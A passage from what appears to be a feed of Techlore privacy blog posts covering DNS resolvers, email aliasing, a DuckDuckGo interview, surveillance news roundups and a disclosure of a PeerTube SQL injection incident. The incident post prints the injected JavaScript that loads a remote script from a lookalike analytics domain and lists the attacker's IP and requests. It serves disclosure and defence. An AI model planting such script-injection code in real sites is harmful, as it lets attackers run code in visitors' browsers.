a log of what's being blocked, which makes troubleshooting and tuning much easier. My own setup runs NextDNS through a [Tailscale](https://tailscale.com) connection that also passes through Mullvad VPN, giving me filtered DNS, VPN coverage, and access to my home network in a single VPN connection. That's an advanced setup and not what most people need. The point is that you can layer these pieces in interesting ways once the basics are in place. One pro tip worth knowing: browsers like [Mullvad Browser](https://mullvad.net/en/browser) and [Tor Browser](https://www.torproject.org) deliberately ignore system DNS and use their own resolvers. This is by design, and it's also a useful diagnostic. If a site loads in Mullvad Browser but not in your default browser, your DNS provider is almost certainly blocking something. Open the NextDNS log, find the entry, and decide whether to whitelist or leave the block in place. --- ## ✅ Henry's Picks [**Quad9**](https://quad9.net): a strong default for users who want the role-one benefit (private resolution) with passive malware protection layered in. No IP logging. Free. Easy to configure on every modern OS and browser. [**Mullvad DNS**](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls): public resolver from Mullvad, available to anyone (not just VPN subscribers). RAM-only servers, no query logs, and optional content-blocking variants for ads, trackers, social media, NSFW, and malware. Strong pick if you want zero logging plus optional baseline filtering without the customization layer. [**NextDNS**](https://nextdns.io): the right pick when role two (active filtering) is what you're after. Custom blocklists, granular per-category control, optional query logging under your own account for visibility and troubleshooting, and a per-device configuration model that's easier to manage than per-router. Free tier covers 300,000 queries per month. The paid plan (\~$20/year) is unlimited. [**Cloudflare 1.1.1.1**](https://one.one.one.one): independently audited no-selling-of-query-data, source IP anonymization within 24 hours, and broad infrastructure that makes it consistently fast. A solid choice when speed matters and you trust the operator. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Email Aliasing: How to Stop Handing Out Your Real Email Address URL: https://techlore.tech/email-aliasing-how-to-stop-handing-out-your-real-email-address/ Last updated: 2026-07-19T01:29:11.000Z ## 📖 The Basics ### What It Is An email alias is a forwarding address that routes email to your real inbox without exposing your real email address. When a service sends to the alias, you receive it normally in your actual inbox. When you reply, the alias appears as the sender. Your real address never appears in the exchange. The practice of using aliases instead of your real email is called email aliasing. It's one of the most practical and underused privacy habits available, because the setup cost is low (a browser extension generating aliases in one click) while the protection compounds over time with every new signup. ### How It Works #### The Forwarding Chain When you create an alias through a service like [SimpleLogin](https://simplelogin.io) or [addy.io](https://addy.io), you get an address like `newsletter@simplelogin.com`. You give this address to a service when signing up. That service now holds only the alias, not your real address. Email sent to the alias routes through the aliasing service and arrives in your real inbox. To the outside world, `newsletter@simplelogin.com` is your email address for that service, but your real address exists nowhere in the interaction. Replies work through the same chain in reverse: your aliasing service rewrites the reply headers so your reply appears to come from the alias. The recipient never sees your real address. --- #### Why One Alias Per Service is Optimal The goal is for every service to get a unique alias. Your streaming subscription gets one. Your tofu press gets another. The newsletter you subscribed to gets another. This does three things that a single shared alias or your real address can't: - *Breach containment.* When a service is breached and its user database is leaked, the email address exposed is associated only with that service. It can't be cross-referenced to find your other accounts. The breach is isolated to one alias you can immediately disable. - *Spam source identification.* If one alias starts receiving spam or marketing email you didn't sign up for, you know exactly which service sold or leaked it, because only one service had that address. You disable the alias. The spam stops. No unsubscribe links, no filtering rules. - *Identity decoupling.* Your real email address—the one linked to your name, your account recovery flows, your longest-standing digital relationships—stays off the databases of services you sign up for. While grouping services into a single alias (like all social media accounts under one alias) is still better than nothing, you may as well do the optimal 'one alias per account' given how easy aliasing is nowadays. #### What Happens When an Alias is Compromised You disable it. The alias stops forwarding. New email to that address goes nowhere. You create a new alias for that service if you want to keep using it. This takes seconds and requires no action from the breached service. #### The Difference From Plus-Addressing Many email providers support plus-addressing, where you append a tag after your username, like `yourname+shopping@gmail.com`. This looks like aliasing but provides fewer protections. Many services and data brokers strip the plus tag entirely, normalizing `yourname+shopping@gmail.com` to `yourname@gmail.com`. Your real address is exposed and cross-referenceable across every service you used plus-addressing with. Additionally, the base address before the plus sign is visible to anyone who receives the email, so there's no obscurity. Plus-addressing might still be useful for Gmail inbox filtering, but as a privacy tool it doesn't hold up. #### Catch-All Aliases vs. Per-Service Aliases Some aliasing services let you set up a custom domain with a catch-all, so any email sent to `anything@yourdomain.com` arrives in your inbox. This gives you infinite unique addresses without logging in to create each one: just give `amazon@yourdomain.com` to Amazon, `netflix@yourdomain.com` to Netflix, and so on. The tradeoff is that catch-all addresses are predictable, so anyone who knows your domain can guess the pattern. Per-service generated aliases (random strings like `k7x2m@simplelogin.com`) are unpredictable and harder to enumerate. Both approaches are valid and which you use depends on your threat model. #### The Major Aliasing Services - [*SimpleLogin*](https://simplelogin.io): a full-featured dedicated aliasing service. Open source, self-hostable, works with any email provider regardless of which ecosystem you're in. [Acquired by Proton in April 2022](https://proton.me/blog/proton-and-simplelogin-join-forces) and now part of the Proton ecosystem, but continues to operate independently and remains compatible with Gmail, Fastmail, or any other provider. Integrates natively into [Proton Pass](https://proton.me/pass) if you use that password manager. - [*addy.io*](https://addy.io) (formerly AnonAddy): open source, self-hostable for full infrastructure control, generous free tier. Operates under Dutch jurisdiction. A strong option for users who want to self-host or want independence from any commercial ecosystem. - [*Apple Hide My Email*](https://support.apple.com/en-us/105078): built into iCloud, auto-fills in Safari and iOS when creating accounts. Convenient within the Apple ecosystem, requires iCloud+ subscription, and not usable outside Apple platforms. - [*DuckDuckGo Email Protection*](https://duckduckgo.com/email/): free, unlimited aliases on a `@duck.com` domain. Automatically strips email trackers before forwarding. No custom domain support, but zero cost and zero friction makes it a great entry point. Available through the DuckDuckGo browser or extension. - [*Firefox Relay*](https://relay.firefox.com): free tier offers 5 aliases; premium unlocks unlimited aliases, reply support, and tracker blocking. Integrated directly into Firefox. Best suited for Firefox users who want aliasing baked into their existing workflow. - [*Fastmail Masked Email*](https://www.fastmail.com/masked-email/): if Fastmail is already your email provider, Masked Email is built in. One-click alias generation via the Fastmail extension, with replies going out from the alias by default. Not a standalone service. This requires a Fastmail subscription. - [*IVPN Mailx*](https://www.ivpn.net/en/services/): open-source email aliasing built and operated by the IVPN team. Currently available free to IVPN Pro subscribers with a year or more remaining on their account. Supports custom domains, wildcard aliases, multiple recipients, and PGP encryption. A natural fit if you're already an IVPN customer. Most aliasing services work similarly at their core, and many can be combined with the same inbox for users who want to mix approaches for different use cases. --- ## 🎯 Why It Matters In January 2024, researchers published an analysis of what they called the ["Mother of All Breaches"](https://cybernews.com/security/billions-passwords-credentials-leaked-mother-of-all-breaches/), a compiled dataset of approximately 26 billion records across 12 terabytes. This data was drawn from thousands of previous data breaches from Twitter, Dropbox, LinkedIn, Adobe, Canva, and hundreds of others. When people compile thousands of breach databases and cross-reference by email address, the email address becomes the key that reconstructs a profile of any person. What services they use, what password patterns they rely on, what accounts are linked to the same identity. Every service you've ever signed up for with the same real address contributes to the same profile. Aliasing breaks this at the root. If every service gets a different alias, there's no persistent identifier to cross-reference. A breach at one service exposes an address that appears nowhere else. There's also the question of what your real email address enables. Most account recovery flows rely on email. Your password reset links, your 2FA backup codes, your identity verification for banks and financial services—these often route through your primary email. That email address is high-value, and it's worth protecting. This is the preventative side of data privacy. The Data Brokers article covers the reactive side by removing information that's already out there. Aliasing is what you do so that future signups don't create the same exposure. --- ## 💡 Common Misconceptions ### "Aliasing is a power-user tool." It looks complicated from the outside, but in 2026 the friction is mostly gone. Modern password managers like [Proton Pass](https://proton.me/pass) generate an alias inline with the username and password at signup. A browser extension and one click do the work. The hard part is forming the habit, not the technology. ### "Plus-addressing (`yourname+shopping@gmail.com`) already covers this." It looks like aliasing, but the underlying address is still your real address, and many data brokers and services strip the `+tag` automatically. Plus-addressing is fine for inbox filtering, but it does not isolate your identity the same way. ### "You have to switch every account at once." You don't. The protection compounds from your next signup onward. Start with low-stakes accounts you're creating today like newsletters, shopping, anything where a leak would be an annoyance rather than a crisis. The accounts you've held for ten years can stay where they are until you're ready to migrate them. ### "There's one correct way to alias." There isn't. A custom catch-all domain gives you portability and ownership. If your alias provider disappears tomorrow, you still receive every email you ever signed up for. A generic `@simplelogin.com`\-style address gives you better anonymity and avoids the public link to a domain you own. Both work. Which fits depends on what you're optimizing for. --- ## 🗣️ Henry's Take In 2026, aliasing is one of those rare privacy practices that has almost no drawbacks. You get better breach containment, better spam isolation, an audit trail that tells you exactly which service leaked your address, and an inbox that gets easier to manage as you adopt it. The setup is a browser extension and a habit. Back in the day (like before 2020) this was a *nightmare* of a problem to deal with. Email aliasing wasn't really a mature concept, and so the best advice was still 'create multiple email inboxes for different purposes'—I can still remember having to log in and out of all my email accounts on a daily basis...oh the horror. I firmly believe email aliasing is *the* most impactful development in privacy tools of the last half-decade. It was never possible to generate a new email address for every account, but now it is. And now it can all forward to a single email inbox. I use SimpleLogin, but more specifically I use the Proton Pass integration so all of my aliases are generated automatically when I create my accounts. One setup worth knowing about: you can bring a custom domain *into* SimpleLogin rather than just using it as a raw catch-all. Instead of accepting anything at `@yourdomain.com`, you create individual aliases on your own domain explicitly inside SimpleLogin—`amazon@yourdomain.com` becomes a managed alias, not an open catch-all. SimpleLogin still handles all the forwarding and reply rewriting, but the addresses live on a domain you own. If you ever leave SimpleLogin, the domain comes with you. It's a middle path between the convenience of SimpleLogin's shared domains and the full ownership of a standalone catch-all. If you're talking to a family member who's never aliased anything, the right starting point is low-stakes. Apple's [Hide My Email](https://support.apple.com/en-us/105078) covers an iPhone user with no extra software. SimpleLogin or addy.io covers anyone outside the Apple ecosystem with a browser extension. The first time spam shows up on an alias you can disable instead of on your real inbox is when the practice clicks. --- ## ✅ Henry's Picks [**SimpleLogin**](https://simplelogin.io)**, integrated with** [**Proton Pass**](https://proton.me/pass): This is what I use. SimpleLogin is open source and works with any email provider, including Gmail and Fastmail. The Proton Pass integration generates an alias at the same moment the password manager generates the password, which is the lowest-friction setup I've found. SimpleLogin also runs fine standalone if you'd rather keep it separate from a password manager. [**addy.io**](https://addy.io): open source, self-hostable, generous free tier, Dutch jurisdiction. The right pick for users who want infrastructure control or want to stay clear of any single commercial ecosystem. [**Apple Hide My Email**](https://support.apple.com/en-us/105078): the lowest-friction starter for anyone on iCloud+. Auto-fills in Safari and the iOS account creation flow with no extension required. Limited to Apple platforms and tied to the iCloud subscription, but a real privacy improvement with effectively zero learning curve. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### DuckDuckGo's Director of Product on Ads, Google, and the Ecosystem They're Actually Building URL: https://techlore.tech/duckduckgos-director-of-product/ Last updated: 2026-05-30T16:00:57.000Z [App Tracking, Duck AI, the Microsoft Controversy, and the Future of Private Browsing (DuckDuckGo Interview) | Techlore Talks | Episode 72Most people know DuckDuckGo as a search engine, but they’re also creating a full privacy ecosystem covering a browser, VPN, data broker removal, and app tracking protection. In this Techlore Talks interview, Henry sits down with Peter Dolanjski, Director of Product at DuckDuckGo, to cover what…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-a4883512017aabf1b502cc8cdbe5c1ccb9f401f0b931fa8cb272e42ba41ebb99.ico)App Tracking, Duck AI, the Microsoft Controversy, and the Future of Private Browsing (DuckDuckGo Interview)![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-4939da9afb4d5444bbca01f255932a645ac4a43a737eb7de9f3cbe4f0f355eef.webp)](https://share.transistor.fm/s/d6dd885f) Most people know DuckDuckGo as a search engine, but they're also creating a full privacy ecosystem covering a browser, VPN, data broker removal, and app tracking protection. In this Techlore Talks interview, Henry sits down with Peter Dolanjski, Director of Product at DuckDuckGo, to cover what Google is actually collecting, why incognito mode doesn't do what most people think, how DuckDuckGo's contextual ads differ from Google's behavioral targeting, and more. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • DuckDuckGo: [https://duckduckgo.com](https://duckduckgo.com/) • Duck AI: [https://duck.ai](https://duck.ai/) • No-AI DuckDuckGo: [https://noai.duckduckgo.com](https://noai.duckduckgo.com/) ### A Vulnerability Hit Our PeerTube: Here's What Happened & What It Teaches About Self-Hosting URL: https://techlore.tech/a-vulnerability-hit-our-peertube-heres-what-happened-what-it-teaches-about-self-hosting/ Last updated: 2026-05-29T00:30:38.000Z Every piece of software has security flaws nobody has found yet. WordPress, Nextcloud, your mail server, all of it. The flaws sit there until someone discovers them, and then the clock starts ⏰ A race between the people who patch and the people who exploit. As a lifelong runner, I respect a good race. But this kind is a *lot* more stressful to navigate! ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/05/image-4-1-1.png) Little Henry racing **Let's start with a simple fact:** When you use a hosted service like this blog, a security team is 24/7 dedicated to ensuring the safety of users. The [Ghost team](https://ghost.org/) is incredible at what they do. But the moment you self-host, that now becomes **your** responsibility. In May, a vulnerability in PeerTube, the open-source software behind our self-hosted [techlore.tv](https://techlore.tv/), was exploited. Our instance was one of many impacted, though fortunately no personal data was exposed and it's unlikely anyone's safety was at risk. But this incident highlights the tradeoff at the heart of self-hosting: you get real independence, but in exchange you become the person in charge of keeping it safe. Here's what that responsibility actually looks like and the lessons I wanted to share from this incident. ## What Happened? PeerTube versions pre-8.1.6 contained a SQL injection vulnerability that let an attacker mint an auth token for the root account with no password required. PeerTube patched it with **v8.1.6 on May 20, 2026**, but their own release notes confirm the flaw was exploited before the patch even existed. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/05/image-3-1.png) PeerTube Release Notes Our instance was hit on **May 22**. Based on our server logs, the attacker's entire footprint was five requests from a single IP (`20.240.202.159`, using a plain `curl/8.5.0` client) | Time (UTC) | Request | Result | | ---------- | ---------------------------------------- | ---------------------------- | | 14:46:19 | GET /api/v1/users/me | 200 — confirmed admin access | | 20:50:51 | GET /api/v1/users/me | 200 — re-checked \~6h later | | 20:50:53 | POST /api/v1/plugins/install | 200 — installed the plugin | | 20:50:53 | GET /api/v1/plugins/... | 200 — verified the install | | 20:50:53 | GET /plugins/.../common-client-plugin.js | 200 — fetched the script | That's the whole log, which means no accounts were created, no settings changed, and no videos touched. We dealt with the same hit-and-run pattern reported across other affected instances. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/05/image-2.png) Screenshot of techlore.tv with the malicious plugin Like the other reported attacks, the plugin they installed injected one line into every page on our site: ```javascript const script = document.createElement('script') script.src = 'https://www.googie-anaiytics.com/jquery.ui.js' document.head.appendChild(script) ``` When I examined it, the script did nothing but print a harmless line to the browser console. To summarize the complete incident response: 1. Collected evidence and logs 2. Removed the plugin 3. Revoked the attacker's login 4. Updated to the patched version and confirmed nothing else had been altered I also wanted to give a shoutout to [Solomon Tech](https://blog.solomon.tech/posts/may-peertube-security-incident/) for their excellent coverage, it's how this first hit my radar after someone in our private Signal group forwarded it to me. And now that I've covered the incident, I wanted to circle back to two core lessons every self-hoster should sit with. ## Self-Hosting Lesson 1: Host as little sensitive data as possible ![low-angle photography of metal structure](https://images.unsplash.com/photo-1545987796-200677ee1011?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wwfDF8c2VhcmNofDEyfHxkYXRhfGVufDB8fHx8MTc4MDAxMDk1M3ww&ixlib=rb-4.1.0&q=80&w=2000) Photo by [Alina Grubnyak](https://unsplash.com/@alinnnaaaa) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) When you self-host, you become the custodian of whatever data you collect. That can include accounts, emails, passwords, logs, and other personal data. So the question to ask before hosting anything is: What's the least amount of data you can collect to still provide a quality experience? When I noticed the malicious plugin, my first 'freak out' was about how this would impact our viewers. But since we host no accounts, no emails, no watch histories...even with admin access the potential damage is well-contained, so my initial concerns passed quickly. There's also currently no evidence of malicious scripts being pushed to viewers on impacted PeerTube instances. **Put simply:** The more data you collect, the greater your risk, and the stronger your security posture needs to be. ## Self-Hosting Lesson 2: Line up for the patch race ![low angle photography of track field](https://images.unsplash.com/photo-1457470572216-1240fac24b37?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHx0cmFja3xlbnwwfHx8fDE3ODAwMTIwMjJ8MA&ixlib=rb-4.1.0&q=80&w=2000) Photo by [Tirza van Dijk](https://unsplash.com/@tirzavandijk) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) Self-hosting means you're the one who has to know a vulnerability exists, judge whether it's urgent, and apply the fix before the gap gets used. It's a race where you don't get to pick the start date. While I feel I did a lot right, it still wasn't enough. I "watch" the PeerTube repo on GitHub, so I'm notified of every release the moment it ships. I run automatic updates on a weekly schedule. But I headed into my weekend without opening the email and the automatic updates were set for Monday, several days into active exploitation. The only reason I patched it before the automatic update was because one of our Techlorians pinged me about it on Signal. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/05/image-5-1.png) Message sent to me from our Techlorian Signal group This is a tough problem to solve without a dedicated team watching infrastructure 24/7, which most of us self-hosting don't have. And I **don't** think the fix is trying harder, it's building systems that depend less on you being online at the right time. I'm experimenting with two things specifically: 1. Separating security releases from the stream of minor ones, so the urgent stuff doesn't get buried. 2. Adding monitoring to the server that alerts me the moment something changes on the instance. The beautiful thing about a real race is that I know the date and can taper my training to peak for it. Self-hosting is the opposite...you're signed up for a pop-up race that can fire on any day, at any hour. And I don't think every self-hoster is aware of this commitment. ## The short version Hold the least amount of sensitive data you can get away with, and treat every security patch like the clock's already running. Should you still self-host? **Yes!** The independence is real. I **love** our [PeerTube instance](https://techlore.tv/). It's our own, independent alternative to YouTube where you can watch our content without ads, distractions, or big tech companies. I think it's a testament that it's still possible for people to have safe places on the internet. But it's important to go into self-hosting understanding the risks. And that's why I'm writing this: to disclose the incident and how it was handled, but also to turn it into something useful for anyone already self-hosting or thinking about starting. This is also why you won't see user registration on [Techlore.TV](https://techlore.tv/) anytime soon. I'd only open that door if we could protect that data as seriously as it deserves, and keeping it off the table entirely is the simplest way to honor the lessons above. Questions about any of this, including the specifics of what happened? Just let me know. And if you're a PeerTube admin feel free to ping me as well if you need any pointers on navigating this incident. ### California Exempts Open Source From Age Verification, Plus School Bus Surveillance Getting Out of Control URL: https://techlore.tech/california-exempts-open-source-from-age-verification-plus-school-bus-surveillance-getting-out-of-control/ Last updated: 2026-05-28T01:13:33.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On Our Radar 🎯 **Open Source Just Got A Real Win Against Age Verification** There are two ways to read this week's biggest story. 1. **The pessimistic way:** age verification laws are still happening, still expanding, still going to require operating systems and app stores to expose age signals to apps. 2. But there's also an **optimistic way this week:** since California is now following Colorado in carving out an exemption for open source operating systems, and that exemption only exists because the open source community spoke up! Both states originally proposed laws requiring every operating system to collect a user's age or birth date during setup and expose that signal downstream. System76, the Linux PC manufacturer based in Colorado, went back and forth with the state senator pushing for an open source exemption that they finally got. And now California is amending its Digital Age Assurance Act to do the same. This means Debian, Fedora, Ubuntu, Arch, Mint, and basically every mainstream Linux distro will be exempt. The bill now narrows its scope to commercial platforms shipping their own app stores: Apple's iOS with the App Store, Google's Android with the Play Store. SteamOS is the odd edge case still being argued. This doesn't dismantle age verification. The Digital Age Assurance Act still exists. If you're against age verification outright, which is a legitimate position with plenty of merit, this is nowhere near a complete victory. But it does two important things: 1. It removes the absurdity of penalizing the people who already opted out of the surveillance economy 2. It sets concrete precedent that other states and countries proposing similar laws will now have to address. **What you can do:** If age verification is being proposed in your state or country, contact your reps this week! Point to California and Colorado as precedent for narrowing the scope. Tell them what kind of operating system you use and why a blanket law penalizes safe technologies. Stories like this are *proof* that political engagement can actually pay off! --- ## Bits & Bytes 🤖 **\~ Story 1: AI Cameras On School Buses Want To Give Cops Access** A company called BusPatrol installed AI-powered cameras on tens of thousands of school buses across the US, originally to catch drivers illegally passing stopped buses. But according to 404 Media, the company is now turning those cameras into automatic license plate readers, capturing the location of every vehicle the buses drive past and giving that data to law enforcement...likely without warrants. **My take:** This is textbook surveillance creep, a tool starts with a defensible purpose, then gets repurposed for *ethically grey* law enforcement once the cameras are deployed, all to "protect the kids." I also want to call attention to the funding, as BusPatrol took a $300 million investment from GI Partners, who are now pushing them to find alternative revenue streams. This is why I always like to ask who funds the tools I'm using, as the incentives of that funding can seriously influence the longevity of the service. **\~ Story 2: A Bipartisan Amendment Could End Police License Plate Tracking Nationwide** A federal highway bill amendment, supported by both parties (yes, shocking in 2026!) would strip federal road funding from any city or state that uses automatic license plate readers for anything other than tolling. These are some of the most egregious forms of surveillance deployed all around the country. Title 23 funds roughly a quarter of all US public road mileage including most state and county arteries, so in practice this would force nearly every jurisdiction to either dismantle their ALPR programs or restructure them around tolls only. This has not yet passed, but the bipartisan backing is genuinely exciting. **My take:** This is funny enough a semi-structural fix to the BusPatrol problem one story up. Private companies are deploying surveillance technology on public roads and selling that data to law enforcement, which can't legally collect it directly themselves—and this amendment targets that loophole directly. Contact your reps! Tell them you support it. Bills like this don't pass without public pressure, and the bipartisan window is a real opportunity. --- ## This Week on Techlore 📺 This week has been a bit lighter on content. The main video I have to share with you is something I put together in light of the recent anti-Google coverage in light of them prioritizing AI over search results. I noticed a lot of people were expressing frustrating about the changes, without actually covering the alternatives to Google. [Google Replaced Search With AI. Here Are 6 Alternatives.Google I/O this year made something very clear: Google Search isn’t really for you anymore. AI agents that buy things on your behalf, Gemini reading your Gmail and Calendar to “personalize” your results, and AI Overviews pushing real links further down the page with every update...it all points![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/final-e6dd87d90cfd1b320d8395ac6f969d32b597f20cc94e7d9c84ba9cb1418892df.png)](https://techlore.tech/google-replaced-search-with-ai-here-are-6-alternatives/) --- ## Action Item ✅ Contact your reps! At the state level about age verification, and at the federal level about the ALPR amendment, or *anywhere* else for your local issues. Both stories this week are happening *because* people are speaking up. If age verification is being proposed where you live, point your reps at California and Colorado as precedent for narrowing the scope. If you're in the US, tell your federal reps you support the bipartisan ALPR amendment. If you're in Europe, same action item. These take five minutes. They actually work, and this week's stories prove it. #### This Week's Sources ****Highlight: Age Verification Is Coming for Everyone, Except Open Source** - ****Story 1: 'BusPatrol' Put AI Cameras on Tens of Thousands of School Buses, Now Wants to Give Cops Access** - ****Story 2: A Bipartisan Amendment Would End Police License-Plate Tracking Nationwide** - ****The Defense Bulletin** Data Breaches - - - - - Threats - - - - - - - - - - - FOSS+ Updates - - - - - - - - - - - - ### Google Replaced Search With AI. Here Are 6 Alternatives. URL: https://techlore.tech/google-replaced-search-with-ai-here-are-6-alternatives/ Last updated: 2026-05-22T05:00:32.000Z Google I/O this year made something very clear: Google Search isn't really for you anymore. AI agents that buy things on your behalf, Gemini reading your Gmail and Calendar to "personalize" your results, and AI Overviews pushing real links further down the page with every update...it all points in the same direction. Google profits when you click ads, when you use their AI, when they collect more of your data. That conflict of interest is baked into the product. What frustrated me about the coverage around this wasn't Google's announcements, it was that many people weren't highlighting the alternatives to get away! So that's what this video is: six search engines with business models that are genuinely built around serving you, not monetizing you, and a realistic path to switching that doesn't require going cold turkey. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### A Brutal Week for Microsoft Security, Signal Threatens to Leave Canada, And Bitwarden Quietly Shifts Policies URL: https://techlore.tech/a-brutal-week-for-microsoft-security-signal-threatens-to-leave-canada-and-bitwarden-quietly-shifts-policies/ Last updated: 2026-05-20T21:51:09.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On Our Radar 🎯 **Microsoft's Worst Week Of 2026** In one week: an actively exploited Exchange zero-day, the MiniPlasma exploit giving SYSTEM access on fully patched Windows, Pwn2Own exploits for Microsoft Exchange, SharePoint, and Windows 11, a report showing Microsoft's critical vulnerabilities literally doubled year-over-year, and an Azure vulnerability. Now here's the thing: vulnerabilities happen on **every** operating system. Linux [just finished](https://techlore.tech/three-linux-exploits-palantir-20m-person-database-and-androids-good-bad-week-surveimay-13/) getting hammered the last few weeks. But just like I said then, what actually matters is the response, the history, the way a organization communicates, and the way they prioritize. Linux is fragmented because it's open and community-driven, and that's a known tradeoff for the ecosystem people love. But Microsoft is one centralized company that should know what they're doing. For context, MiniPlasma originated from a Google Project Zero report Microsoft sat on for **six years**. To me, it feels like we're watching the duct tape come off from years of neglecting the user experience. All of Microsoft's resources poured into AI features nobody asked (earning them the fitting name, *Microslop*) could have gone toward fixing updates, polishing the user experience, and taking security research seriously. I think Microsoft's pushing their limits on user trust when it's already at a low point. **What you can do:** If you run Exchange, apply Microsoft's emergency mitigation for the zero-day ASAP. If you're on Windows, stay patched and watch for the MiniPlasma fix. And if you've been considering reducing your Windows footprint on personal devices or your home network, this is a good week to seriously consider experimenting with alternatives (like Linux!) --- ## Bits & Bytes 🤖 **\~ Story 1: Shai-Hulud Wave Compromises 600+ npm Packages** A new supply chain attack pushed 639 malicious package versions across 333 npm after hackers compromised a single developer's account. Targets included popular charting and visualization libraries and they were hunting for SSH credentials, database creds, Docker, and vaults. **Our take:** Most listeners aren't running npm pipelines, but the underlying lesson applies to everyone: every piece of software you install, from anywhere, requires trusting that the published update was actually authorized by the developer. Never forget the amount of trust required when you install something on your system. **\~ Story 2: Signal Threatens To Pull Out Of Canada** Canada's Bill C-22 is looking to force telecoms, ISPs, and messaging services to add surveillance capabilities for police and intelligence services. But Signal's VP said they'd rather leave the country than compromise on privacy. Apple and Meta have also publicly pushed back. **Our take:** When a company like Meta is publicly opposing your encryption bill, the bill probably has a problem. Canadian politicians are calling this "encryption neutral," but mandating metadata collection on services that currently collect almost nothing is a massive expansion, and metadata can be just as revealing as the messages themselves! And this fight isn't just Canada's, bills that pass in one country set precedent for others. Watch this closely! **\~ Story 3: Meta To Use AI Visual Analysis To Detect Underage Users** Meta is rolling out AI that analyzes user-uploaded photos to estimate age, then auto-restricts accounts it flags as underage. **Our take:** This is what age verification legislation actually looks like in practice. More surveillance technology, more data collection, more identity verification, applied to everyone to try and solve a problem about kids. The actual issues, like addictive algorithms and exploitative design, keep getting routed around in favor of treating a human problem as a technology problem. **\~ Story 4: Bitwarden Is Quietly Changing, And People Are Worried** Bitwarden's longtime CEO and CFO have both stepped down. The company removed "Always Free" from their prominent password manager messaging. Nothing has changed about the product yet, but it's hard to ignore. **Our take:** Nothing concrete has happened, and we shouldn't rush to speculation. But these are exactly the kinds of signals worth tracking. Bitwarden's free tier has been the entry point for a huge number of people who get into password management for the first time! If that erodes, we lose a critical onramp into the whole category. --- ## This Week on Techlore 📺 This week we had some fun content. I shared some thoughts on doomerism takes I saw on a viral YouTube video and how we can tackle the hopelessness: [Why Even Smart People Think Privacy Is Dead“Privacy is dead, lol.” “You’re naive to still care.” If you’ve seen those comments under every privacy story, you’ve witnessed an engineered hopelessness (digital resignation) with a clear designer and a measurable cost. In this video, I break down who built it, why it’s a lie, and the simple, free![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-09c6fcab10182e9db54629ba2c825c15a4baf6b381c83dd339f0b4024b36e9a1.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v4-2-61584174e26a3a101f41d9ddb99092403ae9459d529e07f9d0cd585d4f388b3c.png)](https://techlore.tech/why-even-smart-people-think-privacy-is-dead/) We were also SUPER excited to have on Naomi Brockwell to discuss her Surveillance Accountability Act and how we all can fight for a better digital internet: [Naomi Brockwell on Digital Privacy Legislation, the Third Party Doctrine, and Fighting the Surveillance State with The Surveillance Accountability ActTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and 